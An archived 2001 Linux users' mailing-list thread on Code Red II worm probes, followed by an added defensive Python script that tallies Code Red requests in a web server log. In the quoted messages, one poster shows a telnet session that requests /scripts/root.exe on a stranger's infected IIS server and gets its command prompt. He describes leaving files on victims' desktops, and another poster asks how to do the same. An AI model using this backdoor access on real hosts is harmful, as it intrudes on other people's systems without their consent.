CR worm infection attempts

Author: plug-discuss@lists.PLUG.phoenix.az.us
Date:  
Subject: CR worm infection attempts
I have contemplated doing the same, but I fear for the idiot who comes
back with a lawsuit saying "YOU EVIL PERSON! YOU EXPLOITED MY
MACHINE!" When all I was doing was informing them of their problem.


On Sun, Aug 05, 2001 at 09:20:44PM -0700, Gary Nichols wrote:
> To answer your question... make sure you're hitting enter TWICE after
> the command.
>
> As a security guy myself, I'm deeply troubled by what I'm finding.
> Check it out:
>
> [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80
> Trying xxx.xxx.xxx.xxx...
> Connected to xxx.xxx.xxx.xxx.
> Escape character is '^]'.
> GET /scripts/root.exe HTTP/1.0
>
> HTTP/1.1 200 OK
> Server: Microsoft-IIS/5.0
> Date: Mon, 06 Aug 2001 04:22:13 GMT
> Content-Type: application/octet-stream
> Microsoft Windows 2000 [Version 5.00.2195]
> (C) Copyright 1985-1999 Microsoft Corp.
>
> c:\inetpub\scripts>
>
> From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's
> that explains how I did it, and why they need to pay attention to
> security patches. :)
>
> Hopefully they won't take it the 'wrong' way.
>
> ~g~
>
> On 05 Aug 2001 15:15:02 -0700, Craig White wrote:
> > Wayne Conrad wrote:
> > >
> > > On Sun, 05 August 2001, "J.Francois" wrote:
> > > > I got tired of counting and just started putting the info into my IDS page.
> > > > That way I can send complaints and point them to a URL so I don't have to
> > > > keep recreating the same data each time.
> > >
> > > Are you putting the IP's up too?  Every one of the CRII infected boxes is rooted...  I wonder about the goodness of publishing a list of known rooted boxes.
> > >     Wayne
> >
> > I've been trying that out
> >
> > telnet ipaddress_from_my_httpd_access_log 80
> >
> > GET /scripts/root.exe HTTP/1.0
> >
> > but I can't get a command prompt - what am I missing?
> >
> > Craig
> > ________________________________________________
> > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail.
> >
> > PLUG-discuss mailing list -
> > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
> >


--
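
The thread talks about counting Code Red hits seen in an httpd access log. The script below is an added example, not part of the original messages, that tallies those hits per source from your own server's log. It assumes Apache Common Log Format; the sample lines and addresses are constructed, and the `default.ida` pattern (a long run of `N` or `X` in the query string) is the commonly documented Code Red request shape rather than something quoted in this thread.

```python
import re
from collections import Counter

# Constructed sample in Common Log Format (documentation-range IPs, not real hosts).
SAMPLE_LOG = """\
192.0.2.10 - - [05/Aug/2001:14:02:11 -0700] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 276
192.0.2.10 - - [05/Aug/2001:14:02:12 -0700] "GET /default.ida?XXXXXXXXXXXXXXXX HTTP/1.0" 404 276
198.51.100.7 - - [05/Aug/2001:15:15:40 -0700] "GET /scripts/root.exe HTTP/1.0" 404 281
203.0.113.5 - - [05/Aug/2001:15:20:01 -0700] "GET /index.html HTTP/1.0" 200 1024
198.51.100.7 - - [05/Aug/2001:15:21:09 -0700] "GET /SCRIPTS/Root.exe HTTP/1.0" 404 281
garbage line that is not CLF
"""

# host ident user [time] "METHOD path proto" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) \S+')

def classify(path):
    """Label a request path as a Code Red-style hit, or return None."""
    base, _, query = path.partition("?")
    base = base.lower()  # IIS paths are case-insensitive, so compare lowercased
    if base == "/scripts/root.exe":
        return "root.exe backdoor probe"
    if base == "/default.ida" and re.match(r"[NX]{8,}", query):
        return "default.ida worm request"
    return None

def summarize(log_text):
    """Return (hits per source IP, hits answered with 200, unparsable line count)."""
    per_source, answered, skipped = {}, [], 0
    for line in log_text.splitlines():
        m = CLF.match(line)
        if not m:
            skipped += 1
            continue
        ip, when, _method, path, status = m.groups()
        label = classify(path)
        if label is None:
            continue
        per_source.setdefault(ip, Counter())[label] += 1
        if status == "200":
            # This server itself answered the request: inspect this host first.
            answered.append((ip, when, path))
    return per_source, answered, skipped

if __name__ == "__main__":
    sources, answered, skipped = summarize(SAMPLE_LOG)
    for ip, counts in sorted(sources.items()):
        print(ip, dict(counts))
    print("answered with 200:", answered, "| unparsable lines:", skipped)
```

Any entry in the "answered with 200" list means the logged server served the path itself, which on an IIS host matches the response shown in the transcript above and calls for treating that machine as compromised.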